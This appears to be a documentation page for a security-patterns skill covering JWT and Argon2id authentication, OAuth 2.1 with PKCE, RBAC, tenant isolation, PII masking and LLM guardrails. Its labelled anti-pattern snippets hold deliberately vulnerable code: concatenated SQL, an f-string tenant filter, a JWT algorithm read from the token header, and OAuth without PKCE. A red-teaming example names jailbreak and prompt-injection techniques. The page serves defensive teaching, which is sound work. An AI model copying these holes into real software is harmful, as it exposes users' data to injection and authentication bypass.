Skip to main content
OrchestKit v6.7.1 — 67 skills, 38 agents, 77 hooks with Opus 4.6 support
OrchestKit
Skills

Security Patterns

Security patterns for authentication, defense-in-depth, input validation, OWASP Top 10, LLM safety, and PII masking. Use when implementing auth flows, security layers, input sanitization, vulnerability prevention, prompt injection defense, or data redaction.

Reference high

Primary Agent: security-auditor

Security Patterns

Comprehensive security patterns for building hardened applications. Each category has individual rule files in rules/ loaded on-demand.

Quick Reference

CategoryRulesImpactWhen to Use
Authentication3CRITICALJWT tokens, OAuth 2.1/PKCE, RBAC/permissions
Defense-in-Depth2CRITICALMulti-layer security, zero-trust architecture
Input Validation3HIGHSchema validation (Zod/Pydantic), output encoding, file uploads
OWASP Top 102CRITICALInjection prevention, broken authentication fixes
LLM Safety3HIGHPrompt injection defense, output guardrails, content filtering
PII Masking2HIGHPII detection/redaction with Presidio, Langfuse, LLM Guard
Scanning3HIGHDependency audit, SAST (Semgrep/Bandit), secret detection
Advanced Guardrails2CRITICALNeMo/Guardrails AI validators, red-teaming, OWASP LLM

Total: 20 rules across 8 categories

Quick Start

# Argon2id password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)
ph.verify(password_hash, password)
# JWT access token (15-min expiry)
import jwt
from datetime import datetime, timedelta, timezone
payload = {
    'sub': user_id, 'type': 'access',
    'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
}
token = jwt.encode(payload, SECRET_KEY, algorithm='HS256')
// Zod v4 schema validation
import { z } from 'zod';
const UserSchema = z.object({
  email: z.string().email(),
  name: z.string().min(2).max(100),
  role: z.enum(['user', 'admin']).default('user'),
});
const result = UserSchema.safeParse(req.body);
# PII masking with Langfuse
import re
from langfuse import Langfuse

def mask_pii(data, **kwargs):
    if isinstance(data, str):
        data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
        data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
    return data

langfuse = Langfuse(mask=mask_pii)

Authentication

Secure authentication with OAuth 2.1, Passkeys/WebAuthn, JWT tokens, and role-based access control.

RuleDescription
auth-jwt.mdJWT creation, verification, expiry, refresh token rotation
auth-oauth.mdOAuth 2.1 with PKCE, DPoP, Passkeys/WebAuthn
auth-rbac.mdRole-based access control, permission decorators, MFA

Key Decisions: Argon2id > bcrypt | Access tokens 15 min | PKCE required | Passkeys > TOTP > SMS

Defense-in-Depth

Multi-layer security architecture with no single point of failure.

RuleDescription
defense-layers.md8-layer security architecture (edge to observability)
defense-zero-trust.mdImmutable request context, tenant isolation, audit logging

Key Decisions: Immutable dataclass context | Query-level tenant filtering | No IDs in LLM prompts

Input Validation

Validate and sanitize all untrusted input using Zod v4 and Pydantic.

RuleDescription
validation-input.mdSchema validation with Zod v4 and Pydantic, type coercion
validation-output.mdHTML sanitization, output encoding, XSS prevention
validation-schemas.mdDiscriminated unions, file upload validation, URL allowlists

Key Decisions: Allowlist over blocklist | Server-side always | Validate magic bytes not extensions

OWASP Top 10

Protection against the most critical web application security risks.

RuleDescription
owasp-injection.mdSQL/command injection, parameterized queries, SSRF prevention
owasp-broken-auth.mdJWT algorithm confusion, CSRF protection, timing attacks

Key Decisions: Parameterized queries only | Hardcode JWT algorithm | SameSite=Strict cookies

LLM Safety

Security patterns for LLM integrations including context separation and output validation.

RuleDescription
llm-prompt-injection.mdContext separation, prompt auditing, forbidden patterns
llm-guardrails.mdOutput validation pipeline: schema, grounding, safety, size
llm-content-filtering.mdPre-LLM filtering, post-LLM attribution, three-phase pattern

Key Decisions: IDs flow around LLM, never through | Attribution is deterministic | Audit every prompt

PII Masking

PII detection and masking for LLM observability pipelines and logging.

RuleDescription
pii-detection.mdMicrosoft Presidio, regex patterns, LLM Guard Anonymize
pii-redaction.mdLangfuse mask callback, structlog/loguru processors, Vault deanonymization

Key Decisions: Presidio for enterprise | Replace with type tokens | Use mask callback at init

Scanning

Automated security scanning for dependencies, code, and secrets.

RuleDescription
scanning-dependency.mdnpm audit, pip-audit, Trivy container scanning, CI gating
scanning-sast.mdSemgrep and Bandit static analysis, custom rules, pre-commit
scanning-secrets.mdGitleaks, TruffleHog, detect-secrets with baseline management

Key Decisions: Pre-commit hooks for shift-left | Block on critical/high | Gitleaks + detect-secrets baseline

Advanced Guardrails

Production LLM safety with NeMo Guardrails, Guardrails AI validators, and DeepTeam red-teaming.

RuleDescription
guardrails-nemo.mdNeMo Guardrails, Colang 2.0 flows, Guardrails AI validators, layered validation
guardrails-llm-validation.mdDeepTeam red-teaming (40+ vulnerabilities), OWASP LLM Top 10 compliance

Key Decisions: NeMo for flows, Guardrails AI for validators | Toxicity 0.5 threshold | Red-team pre-release + quarterly

Managed Hook Hierarchy (CC 2.1.49)

Plugin settings follow a 3-tier precedence:

TierSourceOverridable?
1. Managed (plugin settings.json)Plugin author ships defaultsYes, by user
2. Project (.claude/settings.json)Repository configYes, by user
3. User (~/.claude/settings.json)Personal preferencesFinal authority

Security hooks shipped by OrchestKit are managed defaults — users can disable them but are warned. Enterprise admins can lock settings via managed profiles.

Anti-Patterns (FORBIDDEN)

# Authentication
user.password = request.form['password']       # Plaintext password storage
response_type=token                             # Implicit OAuth grant (deprecated)
return "Email not found"                        # Information disclosure

# Input Validation
"SELECT * FROM users WHERE name = '" + name + "'"  # SQL injection
if (file.type === 'image/png') {...}               # Trusting Content-Type header

# LLM Safety
prompt = f"Analyze for user {user_id}"             # ID in prompt
artifact.user_id = llm_output["user_id"]           # Trusting LLM-generated IDs

# PII
logger.info(f"User email: {user.email}")           # Raw PII in logs
langfuse.trace(input=raw_prompt)                   # Unmasked observability data

Detailed Documentation

ResourceDescription
references/oauth-2.1-passkeys.mdOAuth 2.1, PKCE, DPoP, Passkeys/WebAuthn
references/request-context-pattern.mdImmutable request context for identity flow
references/tenant-isolation.mdTenant-scoped repository, vector/full-text search
references/audit-logging.mdSanitized structured logging, compliance
references/zod-v4-api.mdZod v4 types, coercion, transforms, refinements
references/vulnerability-demos.mdOWASP vulnerable vs secure code examples
references/context-separation.mdLLM context separation architecture
references/output-guardrails.mdOutput validation pipeline implementation
references/pre-llm-filtering.mdTenant-scoped retrieval, content extraction
references/post-llm-attribution.mdDeterministic attribution pattern
references/prompt-audit.mdPrompt audit patterns, safe prompt builder
references/presidio-integration.mdMicrosoft Presidio setup, custom recognizers
references/langfuse-mask-callback.mdLangfuse SDK mask implementation
references/llm-guard-sanitization.mdLLM Guard Anonymize/Deanonymize with Vault
references/logging-redaction.mdstructlog/loguru pre-logging redaction
  • api-design-framework - API security patterns
  • ork:rag-retrieval - RAG pipeline patterns requiring tenant-scoped retrieval
  • llm-evaluation - Output quality assessment including hallucination detection

Capability Details

authentication

Keywords: password, hashing, JWT, token, OAuth, PKCE, passkey, WebAuthn, RBAC, session Solves:

  • Implement secure authentication with modern standards
  • JWT token management with proper expiry
  • OAuth 2.1 with PKCE flow
  • Passkeys/WebAuthn registration and login
  • Role-based access control

defense-in-depth

Keywords: defense in depth, security layers, multi-layer, request context, tenant isolation Solves:

  • How to secure AI applications end-to-end
  • Implement 8-layer security architecture
  • Create immutable request context
  • Ensure tenant isolation at query level

input-validation

Keywords: schema, validate, Zod, Pydantic, sanitize, HTML, XSS, file upload Solves:

  • Validate input against schemas (Zod v4, Pydantic)
  • Prevent injection attacks with allowlists
  • Sanitize HTML and prevent XSS
  • Validate file uploads by magic bytes

owasp-top-10

Keywords: OWASP, sql injection, broken access control, CSRF, XSS, SSRF Solves:

  • Fix OWASP Top 10 vulnerabilities
  • Prevent SQL and command injection
  • Implement CSRF protection
  • Fix broken authentication

llm-safety

Keywords: prompt injection, context separation, guardrails, hallucination, LLM output Solves:

  • Prevent prompt injection attacks
  • Implement context separation (IDs around LLM)
  • Validate LLM output with guardrail pipeline
  • Deterministic post-LLM attribution

pii-masking

Keywords: PII, masking, Presidio, Langfuse, redact, GDPR, privacy Solves:

  • Detect and mask PII in LLM pipelines
  • Integrate masking with Langfuse observability
  • Implement pre-logging redaction
  • GDPR-compliant data handling

Rules (18)

Auth: JWT Tokens & Password Hashing — CRITICAL

JWT Tokens & Password Hashing

Password Hashing (Argon2id)

from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError

ph = PasswordHasher(
    time_cost=3,        # Number of iterations
    memory_cost=65536,  # 64 MB
    parallelism=4,      # Number of threads
)

def hash_password(password: str) -> str:
    return ph.hash(password)

def verify_password(password_hash: str, password: str) -> bool:
    try:
        ph.verify(password_hash, password)
        return True
    except VerifyMismatchError:
        return False

def needs_rehash(password_hash: str) -> bool:
    return ph.check_needs_rehash(password_hash)

JWT Access Token

import os
import jwt
from datetime import datetime, timedelta, timezone

SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15

def create_access_token(user_id: str, roles: list[str] = None) -> str:
    now = datetime.now(timezone.utc)
    payload = {
        "sub": user_id,
        "type": "access",
        "roles": roles or [],
        "iat": now,
        "exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
    }
    return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)

def verify_access_token(token: str) -> dict | None:
    try:
        payload = jwt.decode(
            token, SECRET_KEY,
            algorithms=[ALGORITHM],  # NEVER read from header
            options={'require': ['exp', 'iat', 'sub']},
        )
        if payload.get("type") != "access":
            return None
        return payload
    except jwt.ExpiredSignatureError:
        return None
    except jwt.InvalidTokenError:
        return None

Token Expiry Guidelines

Token TypeExpiryStorage
Access15 min - 1 hourMemory only
Refresh7-30 daysHTTPOnly cookie

Refresh Token Rotation

import secrets
import hashlib
from datetime import datetime, timedelta, timezone

def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
    old_hash = hashlib.sha256(old_token.encode()).hexdigest()

    token_record = db.query("""
        SELECT user_id, version FROM refresh_tokens
        WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
    """, [old_hash]).fetchone()

    if not token_record:
        raise InvalidTokenError("Refresh token invalid or expired")

    user_id, version = token_record

    # Revoke old token
    db.execute("UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?", [old_hash])

    # Create new tokens
    new_access_token = create_access_token(user_id)
    new_refresh_token = secrets.token_urlsafe(32)
    new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()

    db.execute("""
        INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
        VALUES (?, ?, ?, ?)
    """, [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])

    return new_access_token, new_refresh_token

Session Security

app.config['SESSION_COOKIE_SECURE'] = True      # HTTPS only
app.config['SESSION_COOKIE_HTTPONLY'] = True    # No JS access
app.config['SESSION_COOKIE_SAMESITE'] = 'Strict'

Anti-Patterns

# NEVER store passwords in plaintext
user.password = request.form['password']

# NEVER trust algorithm from JWT header
payload = jwt.decode(token, SECRET, algorithms=jwt.get_unverified_header(token)['alg'])

# NEVER reveal if email exists
return "Email not found"  # Information disclosure

# ALWAYS use Argon2id or bcrypt
password_hash = ph.hash(password)

# ALWAYS hardcode algorithm
payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])

# ALWAYS use generic error messages
return "Invalid credentials"

Incorrect — Algorithm confusion vulnerability allows "none" algorithm attack:

# Reading algorithm from untrusted JWT header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" to bypass signature verification

Correct — Hardcode expected algorithm to prevent confusion attacks:

# Always specify the expected algorithm explicitly
payload = jwt.decode(
    token, SECRET_KEY,
    algorithms=['HS256'],  # Never read from header
    options={'require': ['exp', 'iat', 'sub']},
)

Implement OAuth 2.1 with mandatory PKCE, token rotation, and phishing-resistant passkeys — CRITICAL

OAuth 2.1 & Passkeys/WebAuthn

OAuth 2.1 Key Changes

  • PKCE required for ALL clients (not just public)
  • Implicit grant removed (security vulnerability)
  • Password grant removed (credential anti-pattern)
  • Refresh token rotation mandatory

PKCE Flow (Required)

import hashlib, base64, secrets

def generate_pkce_pair():
    code_verifier = secrets.token_urlsafe(64)
    digest = hashlib.sha256(code_verifier.encode()).digest()
    code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
    return code_verifier, code_challenge

verifier, challenge = generate_pkce_pair()

# Step 1: Authorization request
auth_url = f"""https://auth.example.com/authorize?
    response_type=code
    &client_id={client_id}
    &redirect_uri={redirect_uri}
    &code_challenge={challenge}
    &code_challenge_method=S256
    &state={state}
    &scope=openid profile"""

# Step 2: Exchange code for tokens
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "redirect_uri": redirect_uri,
        "client_id": client_id,
        "code_verifier": verifier,
    }
)

DPoP (Demonstrating Proof of Possession)

import jwt, time, uuid

def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
    claims = {
        "jti": str(uuid.uuid4()),
        "htm": http_method,
        "htu": http_uri,
        "iat": int(time.time()),
    }
    headers = {
        "typ": "dpop+jwt",
        "alg": "ES256",
        "jwk": private_key.public_key().export_key(),
    }
    return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)

Passkeys/WebAuthn Registration

from webauthn import generate_registration_options, verify_registration_response
from webauthn.helpers.structs import (
    AuthenticatorSelectionCriteria,
    ResidentKeyRequirement,
    UserVerificationRequirement,
)

options = generate_registration_options(
    rp_id="example.com",
    rp_name="Example App",
    user_id=user.id.encode(),
    user_name=user.email,
    authenticator_selection=AuthenticatorSelectionCriteria(
        resident_key=ResidentKeyRequirement.REQUIRED,
        user_verification=UserVerificationRequirement.REQUIRED,
    ),
)

Passkeys Authentication

from webauthn import generate_authentication_options, verify_authentication_response

options = generate_authentication_options(
    rp_id="example.com",
    allow_credentials=[
        {"id": cred.credential_id, "type": "public-key"}
        for cred in user.credentials
    ],
)

verification = verify_authentication_response(
    credential=client_response,
    expected_challenge=stored_challenge,
    expected_rp_id="example.com",
    expected_origin="https://example.com",
    credential_public_key=stored_credential.public_key,
    credential_current_sign_count=stored_credential.sign_count,
)

# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_count

Frontend Passkey Implementation

// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
  const credential = await navigator.credentials.create({ publicKey: options });
  await fetch('/api/auth/passkey/register', {
    method: 'POST', body: JSON.stringify(credential),
  });
}

// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
  const available = await PublicKeyCredential.isConditionalMediationAvailable();
  if (available) {
    const credential = await navigator.credentials.get({
      publicKey: options, mediation: 'conditional',
    });
  }
}

Anti-Patterns

# NEVER use implicit OAuth grant
response_type=token  # Deprecated in OAuth 2.1

# NEVER skip PKCE
# PKCE is required for ALL clients in OAuth 2.1

# ALWAYS use PKCE with S256
code_challenge=challenge&code_challenge_method=S256

Incorrect — OAuth 2.0 token exchange without PKCE is vulnerable to interception:

# No PKCE verification
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "client_id": client_id,
    }
)

Correct — OAuth 2.1 requires PKCE for all clients to prevent code interception:

# Generate and verify PKCE challenge
verifier, challenge = generate_pkce_pair()
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "client_id": client_id,
        "code_verifier": verifier,  # Proves client possession
    }
)

Enforce role-based access control with multi-factor authentication and rate limiting — CRITICAL

Role-Based Access Control & Multi-Factor Authentication

Role-Based Access Control

from functools import wraps
from flask import abort, g

def require_role(*roles):
    """Decorator to require specific role(s)."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not any(role in g.current_user.roles for role in roles):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

def require_permission(permission: str):
    """Decorator to require specific permission."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not g.current_user.has_permission(permission):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
    return get_all_users()

@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
    return get_patient_by_id(id)

FastAPI RBAC

from fastapi import Depends, HTTPException, status
from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials

security = HTTPBearer()

async def get_current_user(
    credentials: HTTPAuthorizationCredentials = Depends(security)
):
    payload = verify_access_token(credentials.credentials)
    if not payload:
        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
    user = await get_user_by_id(payload["sub"])
    if not user:
        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
    return user

def require_role(*roles):
    async def role_checker(user = Depends(get_current_user)):
        if not any(role in user.roles for role in roles):
            raise HTTPException(status_code=status.HTTP_403_FORBIDDEN)
        return user
    return role_checker

Multi-Factor Authentication (TOTP)

import pyotp
import qrcode
from io import BytesIO
import base64

def generate_totp_secret() -> str:
    return pyotp.random_base32()

def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
    totp = pyotp.TOTP(secret)
    return totp.provisioning_uri(name=email, issuer_name=issuer)

def verify_totp(secret: str, code: str) -> bool:
    totp = pyotp.TOTP(secret)
    return totp.verify(code, valid_window=1)

Complete Login Flow with MFA

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
    email = request.json.get('email')
    password = request.json.get('password')

    user = User.query.filter_by(email=email).first()

    # Don't reveal if user exists
    if not user or not verify_password(user.password_hash, password):
        return {"error": "Invalid credentials"}, 401

    if user.mfa_enabled:
        mfa_token = create_mfa_pending_token(user.id)
        return {"mfa_required": True, "mfa_token": mfa_token}

    return issue_tokens(user)

Rate Limiting

EndpointLimit
Login5 per minute
Password reset3 per hour
MFA verify5 per minute
Registration10 per hour
API general100 per minute
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

limiter = Limiter(app, key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"],
    storage_uri="redis://localhost:6379")

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
    pass

@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour")
def password_reset():
    return {"message": "If email exists, reset link sent"}

Key Decisions

DecisionRecommendation
MFA methodPasskeys > TOTP > SMS
Rate limit5 attempts per minute
Error messagesGeneric "Invalid credentials"
Account lockoutAfter 10 failed attempts
Backup codes10 one-time use codes

Incorrect — Direct role checks in routes leak user enumeration information:

@app.route('/admin/users')
def admin_users():
    if 'admin' not in current_user.roles:
        return {"error": "You are not an admin"}, 403  # Reveals role info
    return get_all_users()

Correct — Generic error messages and proper RBAC decorator prevent enumeration:

@app.route('/admin/users')
@require_role('admin')
def admin_users():
    return get_all_users()
# Returns 403 Forbidden with no role details exposed

Design defense-in-depth with eight security layers from edge protection to observability — CRITICAL

8-Layer Security Architecture

Overview

Defense in depth applies multiple security layers so that if one fails, others still protect the system.

Core Principle: No single security control should be the only thing protecting sensitive operations.

The Architecture

Layer 0: EDGE           | WAF, Rate Limiting, DDoS, Bot Detection
Layer 1: GATEWAY        | JWT Verify, Extract Claims, Build Context
Layer 2: INPUT          | Schema Validation, PII Detection, Injection Defense
Layer 3: AUTHORIZATION  | RBAC/ABAC, Tenant Check, Resource Access
Layer 4: DATA ACCESS    | Parameterized Queries, Tenant Filter
Layer 5: LLM            | Prompt Building (no IDs), Context Separation
Layer 6: OUTPUT         | Schema Validation, Guardrails, Hallucination Check
Layer 7: STORAGE        | Attribution, Audit Trail, Encryption
Layer 8: OBSERVABILITY  | Logging (sanitized), Tracing, Metrics

Layer Details

Layer 0: Edge Protection

  • WAF rules for OWASP Top 10
  • Rate limiting per user/IP
  • DDoS protection
  • Bot detection and geo-blocking

Layer 1: Gateway / Authentication

@dataclass(frozen=True)
class RequestContext:
    """Immutable context that flows through the system"""
    user_id: UUID
    tenant_id: UUID
    session_id: str
    permissions: frozenset[str]
    request_id: str
    trace_id: str
    timestamp: datetime
    client_ip: str

Layer 2: Input Validation

  • Schema validation: Pydantic/Zod for structure
  • Content validation: PII detection, malware scan
  • Injection defense: SQL, XSS, prompt injection patterns

Layer 3: Authorization

async def authorize(ctx: RequestContext, action: str, resource: Resource) -> bool:
    if action not in ctx.permissions:
        raise Forbidden("Missing permission")
    if resource.tenant_id != ctx.tenant_id:
        raise Forbidden("Cross-tenant access denied")
    if not await check_resource_access(ctx.user_id, resource):
        raise Forbidden("No access to resource")
    return True

Layer 4: Data Access

class TenantScopedRepository:
    def __init__(self, ctx: RequestContext):
        self.ctx = ctx
        self._base_filter = {"tenant_id": ctx.tenant_id}

    async def find(self, query: dict) -> list[Model]:
        safe_query = {**self._base_filter, **query}
        return await self.db.find(safe_query)

Layer 5: LLM Orchestration

  • Identifiers flow AROUND the LLM, not THROUGH it
  • Prompts contain only content text
  • No user_id, tenant_id, document_id in prompt text

Layer 6: Output Validation

  • Schema validation (JSON structure)
  • Content guardrails (toxicity, PII generation)
  • Hallucination detection (grounding check)

Layer 7: Attribution & Storage

  • Attribution is deterministic, not LLM-generated
  • Context from Layer 1 is attached to results
  • Audit trail recorded

Layer 8: Observability

  • Structured logging with sanitization
  • Distributed tracing (Langfuse)
  • Metrics (latency, errors, costs)

Implementation Checklist

  • Layer 0: Rate limiting configured
  • Layer 1: JWT validation active, RequestContext created
  • Layer 2: Pydantic models validate all input
  • Layer 3: Authorization check on every endpoint
  • Layer 4: All queries include tenant_id filter
  • Layer 5: No IDs in LLM prompts (run audit)
  • Layer 6: Output schema validation active
  • Layer 7: Attribution uses context, not LLM output
  • Layer 8: Logging sanitized, tracing enabled

Industry Sources

PatternSourceApplication
Defense in DepthNISTMultiple validation layers
Zero TrustGoogle BeyondCorpEvery request verified
Least PrivilegeAWS IAMMinimal permissions
Complete MediationSaltzer & SchroederEvery access checked

Incorrect — Single-layer auth check is vulnerable if JWT verification is bypassed:

@app.get("/documents/{doc_id}")
def get_document(doc_id: UUID, token: str = Header(...)):
    claims = verify_jwt(token)  # Only layer
    return db.query(Document).get(doc_id)

Correct — Multi-layer defense verifies auth, validates input, checks authorization, and filters data:

@app.get("/documents/{doc_id}")
async def get_document(doc_id: UUID, ctx: RequestContext = Depends(get_context)):
    # Layer 1: Gateway verified JWT
    # Layer 2: UUID validation (Pydantic)
    # Layer 3: Authorization
    await authorize(ctx, "documents:read", doc_id)
    # Layer 4: Tenant-scoped query
    repo = TenantScopedRepository(db, ctx, Document)
    return await repo.find_by_id(doc_id)

Defense: Zero Trust & Tenant Isolation — CRITICAL

Zero Trust & Tenant Isolation

Immutable Request Context

from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet

@dataclass(frozen=True)
class RequestContext:
    """
    System context that NEVER appears in LLM prompts.
    Created at gateway, flows through all layers.
    """
    # Identity
    user_id: UUID
    tenant_id: UUID
    session_id: str
    permissions: FrozenSet[str]

    # Tracing
    request_id: str
    trace_id: str
    span_id: str

    # Resource
    resource_id: UUID | None = None
    resource_type: str | None = None

    # Metadata
    timestamp: datetime = None
    client_ip: str = ""

Context Creation at Gateway

from fastapi import Request, Depends

async def get_request_context(request: Request) -> RequestContext:
    auth_header = request.headers.get("Authorization", "")
    if not auth_header.startswith("Bearer "):
        raise HTTPException(401, "Missing authorization")

    token = auth_header[7:]
    claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])

    return RequestContext(
        user_id=UUID(claims["sub"]),
        tenant_id=UUID(claims["tenant_id"]),
        session_id=claims["session_id"],
        permissions=frozenset(claims.get("permissions", [])),
        request_id=request.headers.get("X-Request-ID", str(uuid4())),
        trace_id=generate_trace_id(),
        span_id=generate_span_id(),
        client_ip=request.client.host,
    )

Tenant-Scoped Repository

class TenantScopedRepository(Generic[T]):
    """Cannot be bypassed - tenant filter is mandatory."""

    def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
        self.session = session
        self.ctx = ctx
        self.model = model

    def _base_query(self):
        return select(self.model).where(
            self.model.tenant_id == self.ctx.tenant_id
        )

    async def find_by_id(self, id: UUID) -> T | None:
        """Even by-ID lookup includes tenant check."""
        query = self._base_query().where(self.model.id == id)
        result = await self.session.execute(query)
        return result.scalar_one_or_none()

    async def find_by_user(self) -> list[T]:
        query = self._base_query().where(
            self.model.user_id == self.ctx.user_id
        )
        result = await self.session.execute(query)
        return result.scalars().all()

Vector Search with Tenant Isolation

async def semantic_search(query_embedding: list[float], ctx: RequestContext, limit: int = 10):
    return await db.execute("""
        SELECT id, content, 1 - (embedding <-> :query) as similarity
        FROM documents
        WHERE tenant_id = :tenant_id
          AND user_id = :user_id
          AND embedding <-> :query < 0.5
        ORDER BY embedding <-> :query
        LIMIT :limit
    """, {
        "tenant_id": ctx.tenant_id,
        "user_id": ctx.user_id,
        "query": query_embedding,
        "limit": limit,
    })

Caching with Tenant Isolation

def cache_key(ctx: RequestContext, operation: str, *args) -> str:
    """Cache keys MUST include tenant_id."""
    return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"

Row-Level Security (PostgreSQL)

ALTER TABLE documents ENABLE ROW LEVEL SECURITY;

CREATE POLICY tenant_isolation ON documents
    USING (tenant_id = current_setting('app.tenant_id')::uuid);

SET app.tenant_id = 'tenant-uuid-here';

Audit Logging

class SanitizedLogger:
    REDACT_PATTERNS = {
        r"password": "[PASSWORD_REDACTED]",
        r"api[_-]?key": "[API_KEY_REDACTED]",
        r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
    }
    HASH_FIELDS = {"prompt", "response", "content"}

    def audit(self, event: str, **kwargs):
        sanitized = self._sanitize(kwargs)
        self._logger.info(event, audit=True, **sanitized)

Anti-Patterns

# BAD: Mutable context
class RequestContext:
    user_id: UUID  # Can be changed!

# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."

# BAD: Global query without tenant filter
async def find_all():
    return await db.execute("SELECT * FROM documents")

# BAD: Tenant filter as optional
async def find(tenant_id: UUID | None = None):
    if tenant_id:  # Can be bypassed!
        query += f" WHERE tenant_id = '{tenant_id}'"

# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
    return await db.find(tenant_id=ctx.tenant_id)

Testing Tenant Isolation

async def test_tenant_a_cannot_see_tenant_b_documents(tenant_a_ctx, tenant_b_ctx):
    doc = Document(tenant_id=tenant_b_ctx.tenant_id, content="Secret data")
    await db_session.add(doc)

    repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
    result = await repo.find_by_id(doc.id)

    assert result is None  # Tenant A cannot see tenant B's data

Incorrect — Optional tenant filtering allows cross-tenant data access:

async def find_documents(tenant_id: UUID | None = None):
    query = select(Document)
    if tenant_id:  # Can be bypassed by omitting parameter
        query = query.where(Document.tenant_id == tenant_id)
    return await session.execute(query)

Correct — Immutable RequestContext makes tenant filtering mandatory and tamper-proof:

async def find_documents(ctx: RequestContext):
    # Tenant filter is mandatory via immutable context
    query = select(Document).where(
        Document.tenant_id == ctx.tenant_id  # Cannot be bypassed
    )
    return await session.execute(query)

LLM Red-Teaming and OWASP LLM Compliance — CRITICAL

LLM Red-Teaming and OWASP LLM Compliance

Incorrect -- shipping LLM system without adversarial testing:

# Only testing happy path, no adversarial inputs
def test_chatbot():
    response = chatbot.respond("What's the weather?")
    assert response  # No jailbreak, injection, or bias testing!

Correct -- DeepTeam red-teaming audit:

from deepteam import red_team
from deepteam.vulnerabilities import (
    Bias, Toxicity, PIILeakage,
    PromptInjection, Jailbreaking,
    Misinformation, CompetitorEndorsement
)

async def run_red_team_audit(target_model: callable, attacks_per_vulnerability: int = 10) -> dict:
    results = await red_team(
        model=target_model,
        vulnerabilities=[
            Bias(categories=["gender", "race", "religion", "age"]),
            Toxicity(threshold=0.7),
            PIILeakage(types=["email", "phone", "ssn", "credit_card"]),
            PromptInjection(techniques=["direct", "indirect", "context"]),
            Jailbreaking(multi_turn=True, techniques=["dan", "roleplay", "context_manipulation"]),
            Misinformation(domains=["health", "finance", "legal"]),
        ],
        attacks_per_vulnerability=attacks_per_vulnerability,
    )

    return {
        "total_attacks": results.total_attacks,
        "successful_attacks": results.successful_attacks,
        "attack_success_rate": results.successful_attacks / results.total_attacks,
        "vulnerabilities": [
            {"type": v.type, "severity": v.severity, "mitigation": v.suggested_mitigation}
            for v in results.vulnerabilities
        ],
    }

OWASP Top 10 for LLMs mapping:

OWASP LLM RiskGuardrail Solution
LLM01: Prompt InjectionNeMo input rails, Guardrails AI validators
LLM02: Insecure OutputOutput rails, structured validation
LLM04: Model Denial of ServiceRate limiting, token budgets, timeout rails
LLM06: Sensitive Info DisclosurePII detection, context separation
LLM07: Insecure Plugin DesignTool validation, permission boundaries
LLM08: Excessive AgencyHuman-in-loop rails, action confirmation
LLM09: OverrelianceFactuality checking, confidence thresholds

Framework comparison:

FrameworkBest ForKey Features
NeMo GuardrailsProgrammable flows, Colang 2.0Input/output rails, fact-checking
Guardrails AIValidator-based, modular100+ validators, PII, toxicity
OpenAI GuardrailsDrop-in wrapperSimple integration
DeepTeamRed teaming, adversarial40+ vulnerabilities, GOAT attacks

Key decisions:

  • Red-teaming frequency: Pre-release + quarterly
  • Fact-checking: Required for factual domains (health, finance, legal)
  • DeepTeam for 40+ vulnerability types with OWASP alignment
  • Always test multi-turn jailbreaking (GOAT-style attacks)

Deploy NeMo Guardrails and Guardrails AI to defend against prompt injection and toxicity — CRITICAL

NeMo Guardrails and Guardrails AI

Incorrect -- returning raw LLM output without validation:

# No input sanitization, no output validation
